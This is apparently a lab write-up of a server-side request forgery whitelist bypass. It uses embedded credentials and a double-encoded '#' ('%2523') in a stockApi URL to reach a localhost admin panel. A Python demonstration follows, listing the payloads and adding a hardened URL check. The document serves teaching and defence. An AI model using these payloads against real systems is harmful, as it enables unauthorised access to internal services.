We edited the stockApi parameter to point at localhost and sent the request, but it returned an error stating that only stock.weliketoshop.net was allowed. So the server checks the hostname of the supplied URL against a whitelist containing just that one host:

We then tried the URL:

http://username@stock.weliketoshop.net/

This worked because:

  • The part before @ is parsed as the URL's userinfo component (credentials that a client may send as HTTP Basic Auth), not as part of the host.
  • The hostname remains stock.weliketoshop.net.
  • The app accepted it since the hostname passed the whitelist check.

This confirmed that the server uses a URL parser that supports embedded credentials.

Next, we tried putting a # in the URL before the @:

http://username#@stock.weliketoshop.net/

It was rejected. # starts the fragment, so everything after it (including @stock.weliketoshop.net) is no longer part of the authority; the parser sees username as the hostname, and that fails the whitelist check.

To get past this, we double-encoded the # as %2523:

  • %23 is the first URL encoding of #.
  • %2523 is the URL encoding of %23, i.e. double encoding.
  • The validation layer decodes the parameter once, turning %2523 into %23. To it, %23 is just three ordinary characters inside the userinfo, so the hostname is still stock.weliketoshop.net and the whitelist check passes.
  • The component that actually issues the request decodes a second time, turning %23 into #. At that point the fragment truncates the authority and whatever precedes the # becomes the real hostname. The request we sent therefore looked like:
http://username%2523@stock.weliketoshop.net/

The final exploit used this understanding to reach internal URLs like localhost:

We were able to reach the admin panel on localhost, delete the carlos user and solve the lab.
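As an added illustration (this is not code from the lab or from this writeup), the following Python models the two-stage decoding described above: a validator that decodes the stockApi value once and whitelists the hostname, and an HTTP client behind it that decodes again before connecting. The payloads are constructed here for the demonstration; the localhost:80 target, the /admin path and the assumption that the backend decodes the URL twice are my assumptions, not facts stated on the page. A hardened check that normalises the URL before comparing hostnames is shown alongside the weak one.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOST = "stock.weliketoshop.net"

# Constructed payloads mirroring the steps in the writeup. The admin path and the
# localhost:80 target are assumptions about the lab's layout, not facts from the page.
PAYLOADS = {
    "plain":          "http://localhost/admin",
    "userinfo":       "http://username@stock.weliketoshop.net/",
    "raw_hash":       "http://username#@stock.weliketoshop.net/",
    "single_encoded": "http://localhost:80%23@stock.weliketoshop.net/admin",
    "double_encoded": "http://localhost:80%2523@stock.weliketoshop.net/admin",
}


def validator_host(url):
    """Hostname as seen by the (weak) whitelist check.

    Models a validator that runs after the request parameter has been URL-decoded
    once and then parses the result. Assumption: it decodes exactly once.
    """
    return urlsplit(unquote(url)).hostname


def fetcher_host(url):
    """Hostname the HTTP client actually connects to.

    Models a client library that decodes the URL again before parsing it, so a
    %23 left over from the first decode becomes a literal '#' and truncates the
    authority component. Assumption: this second decode really happens.
    """
    return urlsplit(unquote(unquote(url))).hostname


def weak_check(url):
    """The whitelist as the lab implements it: compare the once-decoded hostname only."""
    return validator_host(url) == ALLOWED_HOST


def hardened_check(url):
    """A check that sees the same URL the fetcher will see.

    - Decode until the string stops changing, so no later decode can alter it.
    - Reject userinfo, fragments and any literal '@' left in the authority.
    - Compare the hostname only after that normalisation.
    """
    current = url
    for _ in range(5):  # bounded: refuse pathological nesting outright
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    else:
        return False
    parts = urlsplit(current)
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username is not None or parts.password is not None:
        return False
    if "@" in parts.netloc or parts.fragment:
        return False
    return parts.hostname == ALLOWED_HOST


def classify(url):
    """Return (passes weak check, host the validator saw, host the fetcher uses)."""
    return weak_check(url), validator_host(url), fetcher_host(url)


if __name__ == "__main__":
    for name, url in PAYLOADS.items():
        ok, seen, real = classify(url)
        verdict = "PASS" if ok else "BLOCKED"
        print(f"{name:15} {verdict:8} validator={seen!r:28} "
              f"fetcher={real!r:12} hardened={hardened_check(url)}")
```

Running it prints one line per payload with the hostname each stage sees. Only the double-encoded payload passes the weak check while the fetcher resolves it to localhost; the single-encoded and raw-# variants are blocked because the validator itself already sees the truncated host, which is the behaviour the writeup observed. The hardened check rejects every payload that carries userinfo or a fragment and accepts only plain URLs on the allowed host.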